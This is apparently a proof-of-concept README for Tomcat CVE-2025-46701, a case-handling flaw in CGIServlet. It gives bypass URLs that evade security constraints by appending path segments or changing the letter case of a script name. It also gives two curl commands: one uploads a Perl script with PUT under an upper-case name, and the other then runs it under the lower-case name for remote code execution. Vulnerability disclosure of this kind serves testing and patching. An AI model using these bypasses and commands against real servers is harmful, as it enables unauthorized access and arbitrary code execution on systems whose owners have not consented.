```license
# License
# Description: Tomcat CVE-2025-46701 PoC
#
# Author: Greg K(https://github.com/gregk4sec)
# Purpose: Educational use and authorized security testing only
#
# Disclaimer: This proof-of-concept is provided of educational purposes and internal security assessments only.
# DO NOT use this against systems without explicit permission.
```

# CVE-2025-46701 PoC
Root cause: CWE-178, Improper Handling of Case Sensitivity.

## Summary
CGIServlet was disabled by default in tomcat installation. 
For those CGI running on case-insensitive directory, both ```servletPath``` and ```pathInfo``` were exploit targets of CGIServlet.

## 0x01 Security Constraint Bypass via pathInfo component
Normally, CGI Servlet URL-Mapping was "/cgi-bin/*".

Given a protected (security-constraint enforced) cgi script URL: https://victim-website/cgi-bin/script.pl

**Bypass url**: https://victim-website/cgi-bin/script.pl/a/b/c

## 0x02 Security Constraint Bypass via servletPath component
Normally, CGI Servlet URL-Mapping was "/cgi-bin/*".

Given a protected (security-constraint enforced) cgi script URL: https://victim-website/cgi-bin/script.pl

**Bypass url**: https://victim-website/cgi-bin/SCRIPT.pl

## 0x03 Arbitrary script RCE
When following conditions were both true:
1. CGI Servlet URL-Mapping was "*.pl"
2. PUT in DefaultServlet was enabled
3. Malicious user could upload file to CGI Servlet target directory (case-insensitive directory)

**Upload Arbitrary Script**

PUT ```RCE.PL``` (Upper Cases) which is served by Default Servlet
```bash
curl "https://x.x.x.x/cgi-bin/RCE.PL" -X PUT -d "print \"$ENV{SERVER_PROTOCOL} 200 OK\n\Content-Type: text/plain\n\n\!\!\!Hacked\!\!\!\n\";" -i
```

**Execute the Script**

Get ```rce.pl```(Lower Cases) which is served by CGI Servlet.
```bash
curl "https://x.x.x.x/cgi-bin/rce.pl" -i
```

## 0x04 END
